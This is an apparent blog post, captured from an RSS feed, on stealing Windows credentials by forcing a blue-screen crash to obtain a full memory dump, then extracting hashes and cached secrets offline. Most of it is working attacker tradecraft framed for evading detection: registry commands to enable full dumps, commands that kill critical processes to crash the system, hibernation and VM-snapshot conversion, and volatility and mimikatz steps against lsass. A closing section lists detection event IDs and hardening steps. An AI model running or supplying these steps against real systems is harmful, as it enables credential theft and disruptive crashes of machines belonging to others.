DefenseEvasionteletype.inhttps://img1.teletype.in/files/4c/17/4c171a06-4a21-4771-be43-d1c76602af92.pngDefenseEvasionhttps://teletype.in/@defenseevasionhttps://teletype.in/@defenseevasion?utm_source=teletype&utm_medium=feed_rss&utm_campaign=defenseevasionTue, 21 Apr 2026 06:14:51 GMTTue, 21 Apr 2026 06:14:51 GMThttps://teletype.in/@defenseevasion/get-passwords-no-one-noticeshttps://teletype.in/@defenseevasion/get-passwords-no-one-notices?utm_source=teletype&utm_medium=feed_rss&utm_campaign=defenseevasionhttps://teletype.in/@defenseevasion/get-passwords-no-one-notices?utm_source=teletype&utm_medium=feed_rss&utm_campaign=defenseevasion#commentsdefenseevasion💀 Windows | Get passwords no one notices 🔑Mon, 04 Nov 2024 19:11:03 GMTDemo: https://t.me/DefenseEvasion]]>Demo: https://t.me/DefenseEvasion/38

Intro

Local and domain cached credentials, tickets and so on are located on your RAM. But real-time extraction is noisy and can be easily detected.

One of existing solutions is to crash target system to get full memory dump, exfiltrate the file and process it remotely to defense evasion.

💡 Tip:

There are cases when you have to reboot the computer, but some servers and computers restrict system restarts. So BSoD also can help to bypass limitations.

In this article

Before we BSoD

0. Check if there is enough disk space to memory dump

Full memory dump occupies as much disk space as RAM stores. If disk space is too low, this technique will not work

1. Make sure complete memory dump enabled

(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled).CrashDumpEnabled -eq 1

1*. Enable if necessary

⚠️ Note:

Admin rights required

  • GUI (System properties --> Advanced system settings --> Advanced --> Startup and Recovery --> Settings)
  • cmd.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f
  • PowerShell
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord
  • Registry Editor (regedit.exe)

2. Make sure MEMORY.DMP file can be created

(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name Overwrite).Overwrite -eq 1

2*. Allow if necessary

⚠️ Note:

Admin rights required

  • cmd.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v Overwrite /d 1 /f
  • PowerShell
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name Overwrite -Value 1 -Type DWord
  • Registry Editor (regedit.exe)

3. Make sure pagefile.sys size is enough

For Complete memory dump %SystemDrive%\pagefile.sys must be >= RAM size + 257 MB

How to BSoD

1. Terminate a critical process

  • Windows 7: csrss.exe
  • Windows 7, 8: wininit.exe
  • Windows 10, 11: svchost.exe

Example

taskkill /im csrss.exe /f
taskkill /im wininit.exe /f
taskkill /im svchost.exe /f

⚠️ Note:

Admin rights required

2. Start a critical process

  • wininit.exe

Example

wininit

⚠️ Note:

This bug was fixed on Windows 11 Admin rights required

3. Start and kill your own critical process

C# implementation: https://github.com/GrumpBoat/ForceBSOD

Example

ForceBSOD.exe

⚠️ Note:

Admin rights required

4. Ask a driver to cause problems

The custom driver can be used to generate BSoD. For example, NotMyFault from Sysinternals package works this way.

Sysinternals implementation: https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault

Supports both GUI and CLI and several ways to crash the system.

Example

notmyfault.exe /crash

⚠️ Note:

Admin rights required

5*. CrashOnCtrlScroll

Set registry values depending on your keyboard. Create REG_DWORD CrashOnCtrlScroll and set 0x1 value under:

  • PS/2: HKLM\System\CurrentControlSet\Services\i8042prt\Parameters
  • USB: HKLM\System\CurrentControlSet\Services\kbdhid\Parameters
  • Hyper-V: HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters

Example

Press and hold the Rightmost Ctrl and then press Scroll Lock twice

⚠️ Warning:

Physical access or VM management console access required!

6*. Raise a NtRaiseHardError

Tools:

🔥 Pros:

No admin needed

Error:

Failed to extract passwords from MEMORY.DMP file which was created using this technique during tests

What else if not RAM?

1. Hiberfil.sys

Path: %SystemDrive%\hiberfil.sys

It stores compressed RAM before the system go to sleep / hibernation state. So you need to decompress it first.

⚠️ Note:

Convert it to .dmp formats with one of these tools:

Hibr2Dmp.exe D:\Dumps\hiberfil.sys D:\Dumps\hiberfil.dmp
py vol.py -f D:\Dumps\hiberfil.sys imageinfo
py vol.py -f D:\Dumps\hiberfil.sys imagecopy --profile=<your_profile> -O D:\Dumps\hiberfil.raw
py vol.py -f D:\Dumps\hiberfil.raw --profile=<your_profile> raw2dmp -O D:\Dumps\hiberfil.dmp

*MoonSols Memory Toolkit is no longer officially distributed

2. Virtual Machine snaphot

⚠️ Note:

Convert it to .dmp formats first following the general approach:

  1. Convert a snapshot to a raw file
  2. Convert a raw file to a .dmp file

VmWare has vmss2core (Built-in tool for VmWare Workstation)

vmss2core.exe -W D:\Dumps\snapshot.vmsn D:\Dumps\snapshot.vmem

How to extract credentials

volatility3

py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump

WinDbg + mimilib.dll

  1. Load a crash dump
  2. Load mimilib.dll using commands listed below
.load D:\Tools\mimilib.dll
!process 0 0 lsass.exe
.process /r /p <NUMBER_FROM_PREVIOUS_STEP>
!mimikatz

rekall + mimikatz plugin

Outdated and not recommended to use

🎁 Bonus

RAM also contains a lot of useful information:

💡 Tip:

Search for vulnerable services (unquoted service path, for example) or recon software installed

🔵 Detection

1. Security EventID 4688, Sysmon EventID 1, PowerShell/Operational EventID 4104

1.1. Process Command Line

wmic recoveros set WriteToSystemLog = False
wmic recoveros set DebugInfoType = 1
wmic recoveros set DebugFilePath = <path>
wmic recoveros set OverwriteExistingDebugFile = 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord
taskkill /im <critical_process_name>
Stop-Process <critical_process_name>

2. Sysmon EventID 13

2.1. Suspicious params of the memory crash dump

Key: HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\

Params:

  • CrashDumpEnabled = DWORD (0x00000001)
  • Overwrite = DWORD (0x00000001)
  • LogEvent = DWORD (0x00000000)
  • DumpFile != %SystemRoot%\MEMORY.DMP

2.2. NotMyFault

Key: HKLM\SYSTEM\CurrentControlSet\Services\MYFAULT

Params:

  • ImagePath = \??\C:\Windows\system32\drivers\myfault.sys

2.3. CrashOnCtrlScroll

Key:

  • HKLM\System\CurrentControlSet\Services\i8042prt\Parameters
  • HKLM\System\CurrentControlSet\Services\kbdhid\Parameters
  • HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters

Params:

  • CrashOnCtrlScroll = DWORD (0x00000001)

3. Security EventID 4697, System EventID 7045

3.1. NotMyFault

Service Name: MYFAULT

Service File Name: %SystemRoot%\system32\drivers\myfault.sys

4. Sysmon EventID 11

4.1. Crash dump creation

File Path: %SystemRoot%\MEMORY.DMP

or just

File Name: MEMORY.DMP

4.2. NotMyFault

File Path: %SystemRoot%\system32\drivers\myfault.sys

5. System EventID 12, 6008, 1001

5.1. EventID 12

Failed to save a crash dump

The crash dump file could not be created due to a lack of free space on the destination drive. Increasing the amount of free space on the destination drive may help prevent this error.

5.2. EventID 6008

The previous system shutdown at HH:mm:ss on ‎DD/‎MM/‎YYYY was unexpected.

5.3. EventID 1001

BSoD has occured

The computer has rebooted from a bugcheck. The bugcheck was: 0x000000ef (0xffffab8ea3c6a080, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: <GUID>.

6. Sysmon EventID 6

6.1. NotMyFault

Every time NotMyFault launches, this Sysmon EventID 6 is generated

ImageLoaded: %SystemRoot%\System32\drivers\myfault.sys

7. Security EventID 4663

Object Name: %SystemRoot%\MEMORY.DMP

Accesses:

  • ReadAttributes
  • ReadData (or ListDirectory)

⚠️ Note:

SACL on %SystemRoot%\MEMORY.DMP must be configured

File Access Auditing must be configrued:

auditpol /set /subcategory:"File System" /success:enable

💪🏻 Hardening

1. Turn off hibernation

powercfg /hibernate off

2. Restrict access to crash dumps files

Save crash dumps to folders which can be accessed by special users only (strong DACL)

3. Do not allow full memory dump

Configure GPO to periodically check CrashControl params, log a crash event to Event Log and disable full memory dump

reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v LogEvent /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 0 /f

⚠️ Note:

Crash dumps can help you identify problems with your software, drivers, etc... So, it's not recommended to set CrashDumpEnabled value to 0x0.

You would better use any of these values instead:

  • 0x2 = Kernel memory dump
  • 0x3 = Small memory dump (64 KB)
  • 0x7 = Automatic memory dump

4. Set VM snaphots retention

5. Periodically change passwords

Once a 30-45 days

]]>